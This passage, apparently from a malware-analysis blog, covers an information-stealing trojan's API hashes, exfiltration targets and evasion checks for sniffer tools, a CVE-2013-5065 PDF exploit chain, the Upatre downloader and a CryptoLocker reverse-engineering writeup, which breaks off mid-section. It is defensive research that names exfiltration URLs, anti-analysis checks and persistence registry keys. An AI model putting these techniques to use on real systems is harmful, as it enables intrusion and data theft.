17CF5544 - RtlGetProcessHeaps<br />
9B2E0E85 - RtlAllocateHeap<br />
41324137 - ZwQuerySystemInformation<br />
086A61AC - RtlReAllocateHeap<br />
E4A0A8C0 - RtlFreeHeap<br />
CD74BF79 - ZwOpenProcess<br />
309A4C54 - ZwClose<br />
73ED9B27 - ZwCreateSection<br />
5D859023 - ZwMapViewOfSection<br />
B62E0ECD - _snprintf<br />
6828791B - ZwTerminateThread<br />
0301DA7D - RtlDecompressBuffer<br />
CE8286AD - ZwAllocateVirtualMemory<br />
<br />
4F515588 - kernel32.dll<br />
1A08B014 - CreateRemoteThread<br />
C3B42C10 - GetModuleFileNameW<br />
98D29F2E - GetModuleFileNameA<br />
63A4DEA5 - GetShortPathNameW<br />
412E83B3 - GetShortPathNameA<br />
EB771CAF - CreateEventA<br />
F6F15646 - ExpandEnvironmentStringsA<br />
438EED48 - CloseHandle<br />
A01B4F40 - GetFileAttributesA<br />
69FB2CCE - GetFileAttributesW<br />
5568AE6B - CreateFileA<br />
DC0BC10F - WriteFile<br />
534D310F - ExitProcess<br />
2415842C - DeleteFileW<br />
7DC71262 - DeleteFileA<br />
293DF8B5 - GetProcessVersion<br />
<br />
5B117232 - advapi32.dll<br />
E4A8B4E0 - OpenProcessToken<br />
3B97B437 - GetTokenInformation<br />
5B1D4476 - EqualSid<br />
1A726DBB - DuplicateTokenEx<br />
F5E6C455 - RegCreateKeyExA<br />
A63ACEB9 - RegSetValueExA<br />
8F2D0F57 - RegCloseKey<br />
<br />
5A4B3EDE - user32.dll<br />
8FAFF46C - FindWindowA<br />
D69D869A - PostMessageA<br />
71669709 - SetWindowLongA<br />
<br />
69DE0153 - shell32.dll<br />
F955B5FA - ShellExecuteA<br />
<br />
69304E4B - ole32.dll<br />
5142539F - CoCreateGuid<br />
<br />
<br />
<b>Information Stealing</b><br />
<br />
This malware has the following capabilities:<br />
<br />
Delete files<br />
Download and execute files<br />
Send stolen data to server<br />
Stop its own process<br />
<br />
But the above routines will not get executed if the following network monitoring tools are running:<br />
<br />
tcpdump.exe<br />
windump.exe<br />
ethereal.exe <br />
wireshark.exe <br />
ettercap.exe <br />
snoop.exe <br />
dsniff.exe<br />
<br />
It steals the following information from a compromised machine:<br />
<br />
Uptime of the machine<br />
Temp folder<br />
File listing on certain directory<br />
Drive Types<br />
Network Resources<br />
TCP and UDP connection table<br />
List of running processes<br />
List of names of open windows<br />
Machine Information (Manufacturer and Model)<br />
Operating System version<br />
Processor Information<br />
Computer Name<br />
Local Group<br />
Local Users<br />
Language<br />
Timezone<br />
Country<br />
Installed Windows Updates<br />
<br />
And then collates and encrypts the above mentioned data before sending them to the following sites via HTTP POST request:<br />
<br />
http://{REMOVED}play.com/wp-includes/sitemap/?rank=78964<br />
http://{REMOVED}ree.ir/wp-content/plugins/online-chat/?rank=87758<br />
<br />
<br />
<br />Anonymoushttp://www.blogger.com/profile/09301814992710231875noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-85863138326255497822013-12-05T00:12:00.001-08:002013-12-10T01:52:02.757-08:00New PDF Exploit uses 2 new vuln's + JJencode<div style="text-align: justify;">
Last week, a new zero-day exploit has been found in the wild. The exploit is a vulnerability that allows attackers to escalate privilege and execute code in kernel or ring0 mode. More details of the CVE-2013-5065 vulnerability can be found in this Microsoft <a href="http://technet.microsoft.com/en-us/security/advisory/2914486" target="_blank">website</a>. After we got a sample of the supposed PDF that was used in the targeted attack,we immediately went to work and here's what we found.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI8d1XKjZW83tv0FjYIaOIsfYecz8LNRBHr543S48BHkTIzuh6aOLI0-oiEOvoBv8cRs-NKrIUs2Mrq9ru34qQBAPrExpouVnu7aGmu5ieODh1HVzFi-Y6zUsL4FtT_u70x3ZMii9Xko0/s1600/jjencodescript.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI8d1XKjZW83tv0FjYIaOIsfYecz8LNRBHr543S48BHkTIzuh6aOLI0-oiEOvoBv8cRs-NKrIUs2Mrq9ru34qQBAPrExpouVnu7aGmu5ieODh1HVzFi-Y6zUsL4FtT_u70x3ZMii9Xko0/s200/jjencodescript.jpg" width="200" /></a></div>
<br />
<div style="text-align: justify;">
Close inspection of the raw file reveals that it contains a strange looking script at the end of its body. No clue can be obtained as to what this script is doing at initial glance. However, one of our colleague indicated that this obfuscation technique is already widely used by malicious scripts and has been out for some time now. The obfuscation itself is not malicious but since it provides the stealth and complexity that most malicious scripts require, it is favored by more malware authors. This obfuscation is called jjencode. More details about this technique can be found on this <a href="http://www.martani.net/2010/10/jjencode-new-way-to-obfuscate.html" target="_blank">blog</a>. De-obfuscating it was a trivial matter, and it can be easily seen that the script contains shellcode that is intended to be executed using an exploit technique ROP (return objected programming).<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGXzlwbCRYWwjBzeUG2Kp0e5brejbwK3eIaFOwCXE7k5vK2lOXKPRrdAUsGlJg_oYSmgXrGgg5ge-zdZm2QTgDPdz9l58IzQLpNWYuvI053VeVMobL7sEEUPvrnMdM41HhA9ryZJk2Xs0/s1600/script.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGXzlwbCRYWwjBzeUG2Kp0e5brejbwK3eIaFOwCXE7k5vK2lOXKPRrdAUsGlJg_oYSmgXrGgg5ge-zdZm2QTgDPdz9l58IzQLpNWYuvI053VeVMobL7sEEUPvrnMdM41HhA9ryZJk2Xs0/s320/script.jpg" width="320" /></a></div>
</div>
<div style="text-align: center;">
<i>De-obfuscated script</i></div>
<br />
<div style="text-align: justify;">
The thing is, the supposed exploit code that escalates privileges using DeviceIoControl cannot be read on the said script, which probably is contained in the shellcode. And in order to make the shellcode work, it would require another exploit in the PDF. So in theory, this PDF malware needs two exploits in order for it to successfully attack the system. Knowing this, we went ahead and analyzed the PDF, made breakpoints on strategic places to catch its shellcode in action.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqwEVjw5Y5HGs72tyoWSge-TrCLR48yrhvlVMHcRCQGaqWnO_3tWUfeR9FuZ3kXikTQGcN23tKJyhvtL3oukjrqKoQMVBgg9v5rsITUbowuAdEm4QqtRvtHzfydOPitvVwa40Dfhyphenhyphend6eg/s1600/initialshell.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqwEVjw5Y5HGs72tyoWSge-TrCLR48yrhvlVMHcRCQGaqWnO_3tWUfeR9FuZ3kXikTQGcN23tKJyhvtL3oukjrqKoQMVBgg9v5rsITUbowuAdEm4QqtRvtHzfydOPitvVwa40Dfhyphenhyphend6eg/s400/initialshell.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>ROP in action</i></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: justify;">
The picture above shows the script was able to put its shellcode in memory. It shows that the script has already gained control of the call stack. It will use a technique called ROP (return oriented programming), since normal buffer overflows would not work in this part of memory where security protections are implemented.</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFO2YK3riK5N3RmPqycYDSNU3X7pjdWQafp9Ay_FKAXszl28PkJlxM2GfCEyqhJqK6b_DKITU8NG9O2bFrLDyBPOOgvY3_omyQImRSdtOA4occMeMJrPuvLtFr0CQZXSVtKpT_ni5_B40/s1600/createfilemap.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="315" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFO2YK3riK5N3RmPqycYDSNU3X7pjdWQafp9Ay_FKAXszl28PkJlxM2GfCEyqhJqK6b_DKITU8NG9O2bFrLDyBPOOgvY3_omyQImRSdtOA4occMeMJrPuvLtFr0CQZXSVtKpT_ni5_B40/s400/createfilemap.jpg" width="400" /></a></div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: center;">
<i> Allocates memory using CreateFileMapping with FFFFFFFF handle</i><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9JdR2HAw2xGBeFZUJ26CKeAKBT6E8aDhSCIGfUTzaN2ebLDmsFTFmild8ObLzQ8G1Asf7qOfWCpPKtHo9FLcu_1NjWvXPS2dmV_iE_ZOW-rmToly13JNuoJor0OReobqk6qQWAXEZgdc/s1600/memcopy.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9JdR2HAw2xGBeFZUJ26CKeAKBT6E8aDhSCIGfUTzaN2ebLDmsFTFmild8ObLzQ8G1Asf7qOfWCpPKtHo9FLcu_1NjWvXPS2dmV_iE_ZOW-rmToly13JNuoJor0OReobqk6qQWAXEZgdc/s400/memcopy.jpg" width="400" /></a></div>
<i> Copies <b>0x400</b> bytes of shellcode in newly allocated memory</i></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: justify;">
It uses a specific DLL where it would implement its API calls, allocates a separate memory region where it would resume the bulk of its shellcode action using CreateFileMapping. Once it successfully copies its shellcode in the new memory, it gets the APIs that it needs using hashes.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWMGGjx1DbWYJJH894I1pVRJF1CymdZ87p01X4HllOh6OP1N9XB7yYXFbxq8xeOFi7Kc89rYXMVKAhDXxNfnDt9JDhORhu0iVI2ynyFTHlAc6-sFGBXoGu0msqIDMvPvMbrU9B02kFGQ0/s1600/hashAPI.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWMGGjx1DbWYJJH894I1pVRJF1CymdZ87p01X4HllOh6OP1N9XB7yYXFbxq8xeOFi7Kc89rYXMVKAhDXxNfnDt9JDhORhu0iVI2ynyFTHlAc6-sFGBXoGu0msqIDMvPvMbrU9B02kFGQ0/s400/hashAPI.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>Comparison of hashes for needed API</i></div>
<br />
<br />
<ul>
<li>ExitProcess</li>
<li>VirtualAlloc</li>
<li>DeviceIoControl</li>
<li>CreateFileA</li>
<li>GetCurrentProcessId</li>
<li>LoadLibraryA</li>
<li>WinExec</li>
<li>WriteFile</li>
<li>CloseHandle</li>
<li>GetTempPathA</li>
<li>GetTempFileNameA</li>
<li>GetFileSize</li>
<li>ReadFile</li>
<li>SetFilePointer</li>
</ul>
<div style="text-align: justify;">
The picture below shows the shellcode attempts to invoke CreateFile with the given argument. This buffer should point to a string "\\\\.\\NDProxy", where it should give a handle and calling DeviceIoControl should perform the exploit EoP (Escalation of Privilege). In turn, this would allow the code to execute a dropped executable with a TMP extension in the %TEMP% folder. However, as you may have noticed, the initial code only copied 0x400 bytes of its code in the new memory. And the pointer to the buffer in CreateFileA indicates the string is located at offset 0x40e... </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6gW-IVDPpXEi0kySgh7-XKI9RYLlZzdZLjCmmzGp2yUIhsTglQiX1AJjcCYiWwtbQ0PA03Z_gqmHtjVDx_hMvm5yumg_VqnbeSrfsWxAIsv4B6eUgDfaL6s7ML1-DK-4b8PsTIN65yQk/s1600/createfile.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6gW-IVDPpXEi0kySgh7-XKI9RYLlZzdZLjCmmzGp2yUIhsTglQiX1AJjcCYiWwtbQ0PA03Z_gqmHtjVDx_hMvm5yumg_VqnbeSrfsWxAIsv4B6eUgDfaL6s7ML1-DK-4b8PsTIN65yQk/s400/createfile.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>CreateFileA where buffer should point to "\\\\.\\NDProxy"</i></div>
<br />
<span id="goog_267791557"></span><span id="goog_267791558"></span><span id="goog_267791563"></span><span id="goog_267791564"></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUzN0ksPkLvaaSu53H1kUPuNGM5hrf2V8dD75wDTRB1tgQc3f7n1CdD3oYwS6nDwWgmlhmzKrIgZbFxMBLYoTyInBd91vnsR06SD8q3_YZJ_xD2-9ez3EWTBU78CTYqvgqXXYJVeE78zI/s1600/device.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUzN0ksPkLvaaSu53H1kUPuNGM5hrf2V8dD75wDTRB1tgQc3f7n1CdD3oYwS6nDwWgmlhmzKrIgZbFxMBLYoTyInBd91vnsR06SD8q3_YZJ_xD2-9ez3EWTBU78CTYqvgqXXYJVeE78zI/s400/device.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>DeviceIoControl with the right arguments should perform EoP</i></div>
<br />
<br />
It will then re-create an executable by decrypting it from the body of the malicious PDF.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj83phFLh2dn6pstb7weAMMeYR1jp6HqrVPey_PNx97tXdXRq_oKHrCpMH_VOCp927_5wexO5GjJhb27YC7I3KTw4G1k32iOyhj2JI-hzPat_0fvCF5wIDjiANkAmOs2_TDC7lkf6S0MiE/s1600/decryptingMZ.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj83phFLh2dn6pstb7weAMMeYR1jp6HqrVPey_PNx97tXdXRq_oKHrCpMH_VOCp927_5wexO5GjJhb27YC7I3KTw4G1k32iOyhj2JI-hzPat_0fvCF5wIDjiANkAmOs2_TDC7lkf6S0MiE/s400/decryptingMZ.jpg" width="352" /></a></div>
<div style="text-align: center;">
<i>Decrypting</i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHpZWzPTErfJRx7-tweagFf5YPukPNpd4xw1Pyn5UAlGlZfcbyXu9uNDYgJ8olKkgVzpNLo2D7uAo5cJbd8ARQvUe-0ea9UtcMJ6BWvs47ZCJp6VIXp9tdXwIEOomSfwG0irEdIUbfa08/s1600/tempfile.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHpZWzPTErfJRx7-tweagFf5YPukPNpd4xw1Pyn5UAlGlZfcbyXu9uNDYgJ8olKkgVzpNLo2D7uAo5cJbd8ARQvUe-0ea9UtcMJ6BWvs47ZCJp6VIXp9tdXwIEOomSfwG0irEdIUbfa08/s400/tempfile.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>Drops a TMP file in TEMP folder</i></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAap3rWmqfXhAAsXeXPUYVkPvrS3lMgdZCQrSWwpBhMMyG1fZtD_sxox4XaMRM0EtT2jEbSPqc6IFF9TC8E9AqsM3BE_uauiEKOAKpTTqdCT78TnL05DuBdsjobwy_tLFVq6L7DUxU7NY/s1600/winexec.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAap3rWmqfXhAAsXeXPUYVkPvrS3lMgdZCQrSWwpBhMMyG1fZtD_sxox4XaMRM0EtT2jEbSPqc6IFF9TC8E9AqsM3BE_uauiEKOAKpTTqdCT78TnL05DuBdsjobwy_tLFVq6L7DUxU7NY/s400/winexec.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>If everything went right, executes a file in kernel mode</i></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />Anonymoushttp://www.blogger.com/profile/15262957865496243491noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-75147889566029527122013-11-18T07:50:00.003-08:002013-11-18T07:50:57.423-08:00Upatre - Zbot downloader in a SpamThis trojan comes as a spam email. Here are sample spam emails:<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-oU0Jj6KsZg-bRvIRmHRYc4Xp2Ctv7cq64BekjYuxxgWz2qGWRuCi6ngHFhrs4C-7TnrUBWKpVNWr0bQaK8ufGBEVLVFuSkJekgklNEhf1mDf7vxjkcX2s9PcWyWzkIB79GAhdmmZ1Dnv/s1600/email1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-oU0Jj6KsZg-bRvIRmHRYc4Xp2Ctv7cq64BekjYuxxgWz2qGWRuCi6ngHFhrs4C-7TnrUBWKpVNWr0bQaK8ufGBEVLVFuSkJekgklNEhf1mDf7vxjkcX2s9PcWyWzkIB79GAhdmmZ1Dnv/s400/email1.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYPsJXpGGhh9D-R7xSMDxFaeYMWF3qhTmp9VuJLGv2D0ioMwDOQj8wp7WsOL7wVqRouU-PBMazC-aXOjNf_OvZMQJ0mp-_Ti-bLMwoRx4TrIdrmI-euvXzdqPz4BCTBzCZ5jZUrvhBTSZR/s1600/email2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYPsJXpGGhh9D-R7xSMDxFaeYMWF3qhTmp9VuJLGv2D0ioMwDOQj8wp7WsOL7wVqRouU-PBMazC-aXOjNf_OvZMQJ0mp-_Ti-bLMwoRx4TrIdrmI-euvXzdqPz4BCTBzCZ5jZUrvhBTSZR/s400/email2.PNG" width="400" /></a></div>
<br />
Like some <a href="http://www.antimalwarelab.com/2013/11/cryptolocker-ransomware.html">CryptoLocker</a> samples, this trojan uses a very similar decryption method. It uses VirtualAlloc to allocate memory space where it will decrypt the embedded PE Image, and then calls VirtualProtect so that it can overwrite itself with the newly decrypted PE Image and then passes the control to it.<br />
<br />
Here's a visual infection flow of this trojan:<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5nMbozk9rqk5iFvZDUjx_tGVZ8K4dptXAsoglwVB7w-7dwzQ-LUg8sMP-qFTTzNOo_xgYBnZI9s8TbQG0-Z-U9ZhCxpgcKYJ6D69LriJMH9kdGWNbj0GdNTdWEaKQKiWdLfaS_gzg2ruI/s1600/infectionflow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5nMbozk9rqk5iFvZDUjx_tGVZ8K4dptXAsoglwVB7w-7dwzQ-LUg8sMP-qFTTzNOo_xgYBnZI9s8TbQG0-Z-U9ZhCxpgcKYJ6D69LriJMH9kdGWNbj0GdNTdWEaKQKiWdLfaS_gzg2ruI/s400/infectionflow.png" width="400" /></a></div>
<br />
<br />
This particular sample that I got to reverse has an interesting anti-debugging technique. It uses RegisterClass and CreateWindowEx as part of its anti-debugging. It will first call RegisterClass to setup the WNDCLASS data structure which contains the address where the next code will go after calling CreateWindowEx.<br />
<br />
Once decrypted and pass over the control the new PE Image, it will create a file named "budha.exe" on %TEMP% folder. This file is a copy of the original binary. And then it will execute this newly created file using ShellExecute.<br />
<br />
This new process will delete the original binary then it will attempt to download and execute files from compromised sites which are hard-coded in its body. And those files that it downloads are known to be Zbot variants.Anonymoushttp://www.blogger.com/profile/09301814992710231875noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-57824082585348829332013-11-17T22:13:00.003-08:002013-11-18T00:04:17.622-08:00CryptoLocker - a Ransomware<b>What is a Ransomware?</b><br />
A ransomware is a malicious program that encrypts all of document, picture and movie files in a computer. And to be able to decrypt them, the user must pay the malware author for some amount of money.<br />
<br />
<b>CryptoLocker</b><br />
This ransomware, once executed, will search for document files that it targets and encrypt them using an RSA algorithm. And the user may pay USD300 to the malware author to recover the encrypted documents. It gives the user options how to pay the ransom (i.e MoneyPak and Bitcoin). If the user chose not to pay, his/her only practical option is to restore from backup.<br />
<br />
<b>Physical File Analysis</b><br />
The sample that I've come across has a green circular icon with a cross inside it and with the following file properties.<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEiXVi59uWUtJYzsEMMBwlMtBnxjEgm-PMwO1VrhtgjZWq4oe5T97k1DDlDnWF2GtyXdZsx0MreHixeg6x6jnuawb2muo-e3FITjlrkMGbY7YFJYAD0BnL5uikc7KgwDC67ZD8-LveAgpO/s1600/file_properties.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEiXVi59uWUtJYzsEMMBwlMtBnxjEgm-PMwO1VrhtgjZWq4oe5T97k1DDlDnWF2GtyXdZsx0MreHixeg6x6jnuawb2muo-e3FITjlrkMGbY7YFJYAD0BnL5uikc7KgwDC67ZD8-LveAgpO/s320/file_properties.PNG" width="233" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<b>The Fun Part (Code Analysis)</b><br />
I used the combination of OllyDbg and IDAPro in reversing this malware. The reason being is OllyDBg doesn't have compiler symbols which IDAPro is rich of. OllyDbg 2.0 doesn't resolve the WinMain of this sample but IDAPro is able to do so. But I used OllyDbg throughout the debugging as I am comfortable with its 'look and feel'.<br />
<br />
This malware is literally self-modifying as it has an encrypted PE file embedded on itself. The decrypted embedded PE Image will overwrite the original file. OllyDbg is able to detect it:<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPwpd_PDhntKiyrSgL8ZHweuj098qrqa1Jx2K7eGKC_z4KWVMu_mJD39Jkl2K-aiXm63jxKuc7K8PIFbL7pk4FdqLtsgmEbyEq3QmOflfBE8DEIVGPnj6w9UXYQ0Z1HTFk8_93iZSsT8P8/s1600/Self_Modifying.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPwpd_PDhntKiyrSgL8ZHweuj098qrqa1Jx2K7eGKC_z4KWVMu_mJD39Jkl2K-aiXm63jxKuc7K8PIFbL7pk4FdqLtsgmEbyEq3QmOflfBE8DEIVGPnj6w9UXYQ0Z1HTFk8_93iZSsT8P8/s640/Self_Modifying.PNG" width="640" /></a></div>
<br />
On the first/original binary, the malware APIs are found in hashes and their matching addresses are traversed to their corresponding DLL. On this case, it only uses kernel32.dll to decrypt itself. This technique is usually seen in packers, encryptors and malwares nowadays to make the life of a malware reverser a little bit harder:<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtNR2OVMGQ5JMeQm4gc2uSDdetzq1WWLiOUOqOx97GnW2-02mvqHcnV72z6q9LZrxoC1uavW_v6-v2dH_dVNii0g4pQLU7I4TS2bwPbwuVbmscq8hOUmjceredBM1nlvkKDoEc-vgZjAeO/s1600/Checking_Hash.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtNR2OVMGQ5JMeQm4gc2uSDdetzq1WWLiOUOqOx97GnW2-02mvqHcnV72z6q9LZrxoC1uavW_v6-v2dH_dVNii0g4pQLU7I4TS2bwPbwuVbmscq8hOUmjceredBM1nlvkKDoEc-vgZjAeO/s640/Checking_Hash.PNG" width="640" /></a></div>
<br />
0x000D4E88 - kernel32.dll<br />
0x003560DA - LoadLibraryExA<br />
0x000E3142h - VirtualAlloc<br />
0x0038D13C - VirtualProtect<br />
0x00348BFA - GetProcAddress<br />
0x000068AE - FlsFree<br />
<br />
Above are the API needed to map the embedded encrypted PE image in the memory. Once mapped, it will then do its decryption routine to reveal the embedded PE Image. This new PE Image will overwritten to the original binary and pass the control to it. I have dumped this new PE Image using Procdump and found out that this new file has an icon of a yellow key. Here's the code that does the said routine:<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaJcq3wJAwOLhbduQKTRUkChQFkcYpIEBZ_dTevTmZs-AoE2PLiIaVdgjUFk0UJLNzLgLT-tFFJxN4Z6oRtsQFNRaDHRee931oAH7KRTEqiUlTPJ-3Gsf87OuBmzprQPnxefNIK_QWUPSz/s1600/PassingControl.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaJcq3wJAwOLhbduQKTRUkChQFkcYpIEBZ_dTevTmZs-AoE2PLiIaVdgjUFk0UJLNzLgLT-tFFJxN4Z6oRtsQFNRaDHRee931oAH7KRTEqiUlTPJ-3Gsf87OuBmzprQPnxefNIK_QWUPSz/s640/PassingControl.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Continuing the analysis, it creates a mutex name with the following format:<br />
Global\<random_name1><br />
Local\<random_name2><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaO1tHigWttRRmS1ccrUlmVczOOx_iP0D6tgbG7ifm5aX0ArVlVsEyRFMOAr8gorK3u-60CSPufVA4bgojCXN5ZXnOL94E4hMKRwH67vL4M1YI3HmMYVYwgov6aGTXAmwPt2PFCfhpWUMV/s1600/mutex_name.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="324" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaO1tHigWttRRmS1ccrUlmVczOOx_iP0D6tgbG7ifm5aX0ArVlVsEyRFMOAr8gorK3u-60CSPufVA4bgojCXN5ZXnOL94E4hMKRwH67vL4M1YI3HmMYVYwgov6aGTXAmwPt2PFCfhpWUMV/s640/mutex_name.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
The random_name are basically generated based from the hash of the path where it will be dropped and combining it with a DWORD key. Each generation of name has different DWORD key. It uses Microsoft <a href="http://msdn.microsoft.com/en-us/library/ms721572.aspx#_security_cryptoapi_gly">CryptoAPIs</a> to generate the hash.<br />
<br />
This malware sample drops a copy of itself in %APPDATA%\Local\<random_file_name>.exe where random_file_name is generated with the same way as the mutex names.<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikMoJ7MMgtzT7aL7yIy5HF8QzyEu-kinO-ODROWph_GfPVr41LeYbyDJiOjFOoaZtJtzX580gGwxqiEcQ-qnWMWPToHD54CKuREzvj0p5VBUifrpOax1iLRyuR1JT-EJzqUZ1o992siz8O/s1600/drop_itself.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikMoJ7MMgtzT7aL7yIy5HF8QzyEu-kinO-ODROWph_GfPVr41LeYbyDJiOjFOoaZtJtzX580gGwxqiEcQ-qnWMWPToHD54CKuREzvj0p5VBUifrpOax1iLRyuR1JT-EJzqUZ1o992siz8O/s640/drop_itself.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Once it dropped a copy of itself, it will spawn a process of the newly created copy of itself with the following CommandLine parameter:</div>
<br />
%APPDATA%\Local\<random_file_name>.exe -r%PATH_OF_CURRENT_EXECUTION%\<random_file_name>.exe<br />
<br />
This command-line will basically remove/delete the file %PATH_OF_CURRENT_EXECUTION%\<random_file_name>.exe<br />
<br />
Now, to debug this new child process, you may follow this:<br />
<br />
NOTE: Don't Step over yet on the CreateProcess API. Do the following first:<br />
1. Open the newly created file using any binary editor.<br />
2. Go to entry point.<br />
3. Write down the first 2 bytes.<br />
4. change the first 2 bytes to EB FE<br />
5. Save it.<br />
6. Go back to the debugged parent process.<br />
7. Step over to CreateProcess API.<br />
8. Open a new OllyDbg.<br />
9. Attach the new process created to OllyDbg.<br />
10. Go to the Entry Point.<br />
11. modify back the original 2 bytes.<br />
12. Continue debugging the child process.<br />
<br />
This newly created process is multi-threaded and will basically do the rest of its malicious deeds. It will create the following registry entry as part of its auto-run mechanism:<br />
<br />
HKCU\Software\Microsoft\Windows\CurrentVersion\Run<br />
CryptoLocker="%APPDATA%\Local\<random_file_name>.exe<br />
<br />
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce<br />
